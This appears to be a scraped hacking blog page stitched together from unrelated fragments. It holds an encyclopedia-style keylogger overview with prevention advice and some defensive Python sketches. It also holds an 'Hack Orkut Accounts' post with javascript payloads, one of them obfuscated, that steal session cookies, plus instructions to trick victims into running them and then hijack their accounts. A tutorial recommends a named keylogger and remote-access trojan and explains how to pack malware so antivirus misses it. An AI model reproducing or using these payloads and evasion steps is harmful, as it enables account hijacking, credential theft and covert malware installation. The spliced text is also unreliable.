  • Hook based: Such keyloggers hook the keyboard with functions provided by the operating system. The operating system warns them any time a key is pressed and it records it.
  • Passive Methods: Here the coder uses operating system APIs like GetAsyncKeyState(), GetForegroundWindow(), etc. to poll the state of the keyboard or to subscribe to keyboard events. These are the easiest to write, but where constant polling of each key is required, they can cause a noticeable increase in CPU usage and can miss the occasional key. A more recent example simply polls the BIOS for preboot authentication PINs that have not been cleared from memory.[1]
  • Form Grabber based: Logs web form submissions by recording the web browser's onsubmit event functions. This records form data before it is passed over the internet and bypasses HTTPS encryption.

2) Remote Access software Keyloggers are local software keyloggers programmed with an added feature to transmit recorded data out of the target computer and make the data available to the monitor at a remote location. Remote communication is facilitated by one of four methods:

  • Data is uploaded to a website or an ftp account.
  • Data is periodically emailed to a pre-defined email address.
  • Data is wirelessly transmitted by means of an attached hardware system.
  • It allows the monitor to log into the local machine via the internet or ethernet and access the logs stored on the target machine.

3) Hardware Keyloggers are used for keystroke logging by means of a hardware circuit that is attached somewhere in between the computer keyboard and the computer. It logs all keyboard activity to its internal memory, which can subsequently be accessed, for example, by typing in a secret key. A hardware keylogger has an advantage over a software solution: because it is not dependent on the computer's operating system, it will not interfere with any program running on the target machine and hence cannot be detected by any software. However, its physical presence may be detected.

4) Remote Access Hardware Keyloggers, otherwise known as Wireless Hardware Keyloggers, work in much the same way as regular hardware keyloggers, except they have the ability to be controlled and monitored remotely by means of a wireless communication standard.

5) Wireless Keylogger sniffers collect packets of data being transferred between a wireless keyboard and its receiver and then attempt to crack the encryption key being used to secure wireless communications between the two devices.

6) Acoustic Keyloggers work by analysing a recording of the sound created by someone typing on a computer. Each character on the keyboard makes a subtly different acoustic signature when stroked. Using statistical methods, it is then possible to identify which keystroke signature relates to which keyboard character. This is done by analysing the repetition frequency of similar acoustic keystroke signatures, the timings between different keyboard strokes and other context information such as the probable language in which the user is writing. A fairly long recording (1000 or more keystrokes) is required so that the statistics are meaningful.

7) Electromagnetic Radiation loggers work by passively capturing electromagnetic emissions of a keyboard, without being physically wired to it.[2]

Cracking

Writing software applications for keylogging is trivial, and like any computer program they can be distributed as a trojan horse or as part of a virus. What is not trivial, however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

Trojan

Young and Yung devised several methods for solving this problem and presented them in their 1997 IEEE Security & Privacy paper[3] (their paper from '96 touches on it as well). They presented a deniable password snatching attack in which the keystroke logging trojan is installed using a virus (or worm). An attacker that is caught with the virus or worm can claim to be a victim. The cryptotrojan asymmetrically encrypts the pilfered login/password pairs using the public key of the trojan author and covertly broadcasts the resulting ciphertext. They mentioned that the ciphertext can be steganographically encoded and posted to a public bulletin board (e.g. Usenet).

Ciphertext

Young and Yung also mentioned having the cryptotrojan unconditionally write the asymmetric ciphertexts to the last few unused sectors of every writable disk that is inserted into the machine. The sectors remain marked as unused. This can be done using a USB token. So, the trojan author may be one of dozens or even thousands of people that are given the stolen information. Only the trojan author can decrypt the ciphertext because only the author knows the needed private decryption key. This attack is from the field known as cryptovirology.

Federal Bureau of Investigation

The FBI used a keystroke logger to obtain the PGP passphrase of Nicodemo Scarfo, Jr., son of mob boss Nicodemo Scarfo. Scarfo Jr. pleaded guilty to running an illegal gambling operation in 2002.[4] The FBI has also reportedly developed a trojan-horse-delivered keylogger program known as Magic Lantern.[5]

Use in surveillance software

Some surveillance software has keystroke logging abilities and is advertised to monitor the internet use of minors. Such software has been criticized on privacy grounds, and because it can be used maliciously or to gain unauthorized access to users' computer systems.

Keylogger prevention

Currently there is no easy way to prevent keylogging. In the future, it is believed that software with secure I/O will be protected from keyloggers. Until then, however, the best strategy is to use common sense and a combination of several methods. It is possible to use software to monitor the connectivity of the keyboard and log its absence as a countermeasure against physical keyloggers. For a PS/2 keyboard, the timeout bit (BIT6 at port 100) has to be monitored.[6] But this only makes sense when the PC is (nearly) always on.

Code signing

64-bit versions of Windows Vista and Server 2008 implement mandatory digital signing of kernel-mode device drivers[7], thereby restricting the installation of key-logging rootkits.

Monitoring what programs are running

A user should constantly observe what programs are installed and running on his or her machine. Also, a perpetrator can use devices connected to PS/2 and USB ports (both of which can be hacked) to secretly install a keylogger and later remove it, along with the user's data.

Anti-spyware

Anti-spyware applications are able to detect many keyloggers and cleanse them. Responsible vendors of monitoring software support detection by anti-spyware programs, thus preventing abuse of the software.

Firewall

Enabling a firewall does not stop keyloggers per se, but can possibly prevent transmission of the logged material over the net if properly configured.

Network monitors

Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with his or her typed information.
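The per-application check a network monitor performs can be sketched as follows. This is an added example, not code from the article or from any product: the log format, the program names, the allowlist and the addresses are all constructed assumptions, and the flagged ports correspond to the FTP and e-mail upload channels listed earlier.

```python
from collections import namedtuple

Conn = namedtuple("Conn", "time process pid proto dst port")

# Constructed sample: outbound connections as a per-application monitor might log them.
SAMPLE_LOG = """\
2008-12-09T10:01:12 firefox.exe 2140 tcp 203.0.113.10:443
2008-12-09T10:01:40 outlook.exe 1888 tcp 198.51.100.25:25
2008-12-09T10:02:03 kbdsvc.exe 3012 tcp 198.51.100.77:21
2008-12-09T10:07:03 kbdsvc.exe 3012 tcp 198.51.100.77:21
2008-12-09T10:09:30 firefox.exe 2140 tcp 198.51.100.25:25
malformed line
"""

# Assumed policy: destination ports each known program is expected to use.
ALLOWED = {"firefox.exe": {80, 443}, "outlook.exe": {25, 110, 143}}
# Ports of the upload channels the article lists (FTP account, e-mail).
EXFIL_PORTS = {21: "ftp", 25: "smtp"}


def parse(log):
    """Turn log text into Conn records, skipping lines that do not fit the format."""
    conns = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 5 or ":" not in parts[4]:
            continue
        dst, _, port = parts[4].rpartition(":")
        if not (parts[2].isdigit() and port.isdigit()):
            continue
        conns.append(Conn(parts[0], parts[1].lower(), int(parts[2]),
                          parts[3], dst, int(port)))
    return conns


def alerts(conns, allowed=ALLOWED):
    """Flag connections from unknown programs or to ports a program should not use."""
    out, seen = [], set()
    for c in conns:
        ports = allowed.get(c.process)
        if ports is None:
            reason = "unknown program"
        elif c.port not in ports:
            reason = "unexpected port for program"
        else:
            continue
        key = (c.process, c.dst, c.port)
        if key in seen:          # one alert per program/destination pair
            continue
        seen.add(key)
        out.append((c.time, c.process, f"{c.dst}:{c.port}", reason,
                    EXFIL_PORTS.get(c.port, "other")))
    return out


if __name__ == "__main__":
    for alert in alerts(parse(SAMPLE_LOG)):
        print(alert)
```

The second alert shows why a program allowlist alone is not enough: a trusted browser process opening an SMTP connection is flagged by the per-program port policy, not by its name.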

Automatic form filler programs

Automatic form-filling programs can prevent keylogging entirely by not using the keyboard at all. Form fillers are primarily designed for web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard, thereby reducing the possibility that private data is being recorded. (Someone with access to browser internals and/or memory can often still get to this information; if SSL is not used, network sniffers and proxy tools can easily be used to obtain private information too.)

It is important to generate passwords in a fashion that is invisible to keyloggers and screenshot utilities. Using a browser integrated form filler and password generator that does not just pop up a password on the screen is therefore key. Programs that do this can generate and fill passwords without ever using the keyboard or clipboard.

Alternative keyboard layouts

Most keylogging hardware/software assumes that a person is using the standard QWERTY keyboard layout, so by using a layout such as Dvorak, captured keystrokes are nonsense unless converted. For additional security, custom keyboard layouts can be created using tools like the Microsoft Keyboard Layout Creator.

One-time passwords (OTP)

Using one-time passwords is completely keylogger-safe because the recorded password is always invalidated right after it's used. This solution is useful if you are often using public computers where you can't verify what is running on them. One-time passwords also prevent replay attacks where an attacker uses the old information to impersonate the user. One example is online banking, where one-time passwords are implemented and protect the account from keylogging attacks as well as replay attacks.

Smart cards

Because of the integrated circuit of smart cards, they are not affected by keyloggers and other logging attempts. A smart card can process the information and return a unique challenge every time you log in. The information cannot usually be used to log in again.

On-screen keyboards

Program-to-program (non-web) keyboards

It is sometimes said that a third-party (or first party) on-screen keyboard program is a good way to combat keyloggers, as it only requires clicks of the mouse. However, this is not always true.

Most on screen keyboards (such as the onscreen keyboard that comes with Microsoft Windows XP) send keyboard event messages to the external target program to type text. Every software keylogger can log these typed characters sent from one program to another. Additionally, some programs also record or take snapshots of what is displayed on the screen (periodically, and/or upon each mouse click).

However, there are some on-screen keyboard programs that do offer some protection, using other techniques described in this article (such as dragging and dropping the password from the on-screen keyboard to the target program).

Web-based keyboards

Web-based on-screen keyboards (written in JavaScript, etc.) may provide some degree of protection. At least some commercial keylogging programs do not record typing on a web-based virtual keyboard. (Screenshot recorders are a concern whenever entire passwords are displayed; fast recorders are generally required to capture a sequence of virtual key presses.)

Notably, the game MapleStory uses, in addition to a standard alphanumeric password, a 4-digit PIN code secured by both on-screen keyboard entry and a randomly changing button pattern; there is no real way to get the latter information without logging the screen and mouse movements; another MMORPG called RuneScape makes a similar system available for players to protect their in-game bank accounts.

Anti-keylogging software

Keylogger detection software is also available. Some software of this type uses "signatures" from a list of all known keyloggers. The PC's legitimate users can then periodically run a scan from this list, and the software looks for the items from the list on the hard drive. One drawback of this approach is that it only protects from keyloggers on the signature-based list, with the PC remaining vulnerable to other keyloggers.

Other detection software doesn't use a signature list, but instead analyzes the working methods of many modules in the PC, allowing it to block the work of many different types of keylogger. One drawback of this approach is that it can also block legitimate, non-keylogging software. Some heuristics-based anti-keyloggers have the option to unblock known good software, but this can cause difficulties for inexperienced users.

Speech recognition

Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the recognition took place.

Handwriting recognition and mouse gestures

Also, many PDAs and lately Tablet PCs can already convert pen (also called stylus) movements on their touchscreens to computer-understandable text successfully. Mouse gestures utilize this principle by using mouse movements instead of a stylus. Mouse gesture programs convert these strokes to user-definable actions, among others typing text. Similarly, graphics tablets and light pens can be used to input these gestures; however, these are becoming less common every day.

The same potential weakness of speech recognition applies to this technique as well.

Macro expanders/recorders

With the help of many freeware/shareware programs, a seemingly meaningless text can be expanded to a meaningful text, most of the time context-sensitively, e.g. "we" can be expanded to "en.Wikipedia.org" when a browser window has the focus. The biggest weakness of this technique is that these programs send their keystrokes directly to the target program. However, this can be overcome by using the 'alternating' technique described below, i.e. sending mouse clicks to non-responsive areas of the target program, sending meaningless keys, sending another mouse click to the target area (e.g. the password field) and switching back and forth.

Window transparency

Using many readily available utilities, the target window could be made temporarily transparent, in order to hinder screen-capturing by advanced keyloggers. Although not a fool-proof technique against keyloggers on its own, this could be used in combination with other techniques.

Non-technological methods

Some keyloggers can be fooled by alternating between typing the login credentials and typing characters somewhere else in the focus window.[8] Similarly, a user can move their cursor using the mouse during typing, causing the logged keystrokes to be in the wrong order. Lastly, someone can also use context menus to remove, copy, cut and paste parts of the typed text without using the keyboard.

Another very similar technique utilizes the fact that any selected text portion is replaced by the next key typed. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd". Then these dummies could be selected with the mouse, and the next character from the password, "e", is typed, which replaces the dummies "asdfsd".

Tuesday, December 9, 2008

Hack Orkut Accounts

If This Doesn’t Work, Please Refer To The “Hot To Hack Gmail, Yahoo, Hotmail, Orkut, or any other” Post - It Has Been Tested, And It Works

First get firefox and the cookie editor plugin for it…u will need them…

Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie…

1) Go to your home page

2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action=’scrapbook.aspx?Action.submit’;nobody.submit()

Put ur eight digit number in the place of (53093255)
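Both scripts above depend on page JavaScript being able to read the session cookie through document.cookie. As an added example (not part of the original post), the following audits Set-Cookie headers for the attributes that remove that access; the header values and the function names are constructed for illustration, with only the cookie name orkut_state taken from the post.

```python
from http.cookies import SimpleCookie

# Attribute key in http.cookies -> label used in the report.
CHECKS = (("httponly", "HttpOnly"), ("secure", "Secure"), ("samesite", "SameSite"))


def audit_response(set_cookie_headers):
    """Return {cookie name: [missing protections]} for a list of Set-Cookie values."""
    findings = {}
    for value in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(value)
        for name, morsel in jar.items():
            findings[name] = [label for key, label in CHECKS if not morsel[key]]
    return findings


def script_readable(findings):
    """Cookies without HttpOnly, i.e. visible to any script running in the page."""
    return sorted(n for n, missing in findings.items() if "HttpOnly" in missing)


def hardened_session_cookie(name, value):
    """Build a Set-Cookie value with the protections the audit looks for."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["path"] = "/"
    jar[name]["httponly"] = True    # not exposed through document.cookie
    jar[name]["secure"] = True      # sent over HTTPS only
    jar[name]["samesite"] = "Lax"   # withheld from most cross-site requests
    return jar[name].OutputString()


# Constructed headers: a weak session cookie, a preference cookie, a hardened one.
SAMPLE_HEADERS = [
    "orkut_state=CONSTRUCTED-VALUE; Path=/",
    "theme=dark; Path=/; Secure",
    hardened_session_cookie("session_id", "CONSTRUCTED-VALUE"),
]

if __name__ == "__main__":
    report = audit_response(SAMPLE_HEADERS)
    for name, missing in report.items():
        print(name, "missing:", ", ".join(missing) or "nothing")
    print("readable by page script:", script_readable(report))
```

HttpOnly stops a script from reading the cookie value; it does not stop a script running in the page from acting with the user's session, so the server should also tie sessions to short lifetimes and re-authentication for sensitive actions.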

How to make ALL Trojan>Virus>Keylogger UNDETECTABLE!

This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:

Tuesday, December 2, 2008